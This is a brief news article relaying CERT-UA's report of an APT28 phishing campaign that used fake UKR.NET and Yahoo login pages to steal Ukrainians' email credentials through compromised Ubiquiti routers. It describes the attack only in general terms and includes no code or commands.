New cyberattack aims to steal email login credentials

0
215
New cyberattack aims to steal email login credentials

CERT-UA, the Ukrainian government’s computer emergency response team, has detected and investigated the spread of phishing attacks by the APT28 hacker group (also known as Pawn Storm, Fancy Bear, BlueDelta) to obtain authentication data of Ukrainians required to log in to public email services.

According to CERT-UA experts, the attackers send HTML files that imitate the web interface of email services (in particular, UKR.NET, Yahoo.com) and implement the technical ability to transmit authentication data entered by the victim via HTTP POST requests. At the same time, the stolen data is transmitted using pre-compromised Ubiquiti devices (EdgeOS).

In June, CERT-UA, in cooperation with Recorded Future, revealed the APT28 (BlueDelta) group’s espionage campaign against Ukrainian organizations.

The governmental Computer Emergency Response Team of Ukraine CERT-UA calls on responsible employees of organizations not to ignore reports of detected signs of anomalous activity and to take immediate measures to reduce the attack surface.

LEAVE A REPLY

Please enter your comment!
Please enter your name here